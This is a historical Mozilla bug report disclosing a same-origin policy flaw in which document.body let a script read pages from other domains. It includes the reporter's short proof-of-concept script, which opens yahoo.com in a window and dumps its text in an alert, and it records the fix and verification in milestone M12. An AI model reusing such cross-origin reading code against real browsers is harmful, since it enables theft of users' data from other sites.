[DOGFOOD] Reading documents using document.body

VERIFIED FIXED in M12

Status

()

P3
normal
VERIFIED FIXED
19 years ago
19 years ago

People

(Reporter: joro, Assigned: norrisboyd)

Tracking

Trunk
x86
Windows 95
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [PDT+], URL)

(Reporter)

Description

19 years ago
document.body seems not to be protected by "Same origin" security policy.
This leads to at least reading arbitrary documents.
The code is:
----------------------------------------
<SCRIPT>
function f(o)
{
 var s='';
 var i;
 s = o.nodeValue;
 if ( o.childNodes )
    for ( i = 0; i < o.childNodes.length; i++ )
       s += f(o.childNodes[i]);
return s;
}
a=window.open("http://www.yahoo.com");
setTimeout("alert(f(a.document.body))",10000);
</SCRIPT>
----------------------------------------
(Assignee)

Updated

19 years ago
Status: NEW → ASSIGNED
Summary: Reading documents using document.body → [Dogfood] Reading documents using document.body
(Assignee)

Comment 1

19 years ago
Marking dogfood for analysis by PDT at jar's request.
(Assignee)

Updated

19 years ago
Summary: [Dogfood] Reading documents using document.body → [DOGFOOD] Reading documents using document.body

Updated

19 years ago
Whiteboard: [PDT+]

Comment 2

19 years ago
Putting on PDT+ radar.
(Assignee)

Updated

19 years ago
Status: ASSIGNED → RESOLVED
Last Resolved: 19 years ago
Resolution: --- → FIXED

Updated

19 years ago
Target Milestone: M12

Comment 3

19 years ago
Putting on M12 radar since fixed during this time.

Updated

19 years ago
Status: RESOLVED → VERIFIED

Comment 4

19 years ago
Windows NT (1999112908) Com:
Javascript Error: access disallowed from scripts at
http://www.nat.bg/~joro/mozilla/body1.html to documents at another domain
URL: http://www.nat.bg/~joro/mozilla/body1.html
LineNo: 16

Javascript Error: uncaught exception: [Exception... "Security error" code:
"1000" nsresult: "0x805303e8 (NS_ERROR_DOM_SECURITY_ERR)" location:
"http://www.nat.bg/~joro/mozilla/body1.html Line: 16"]

Comment 5

19 years ago
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.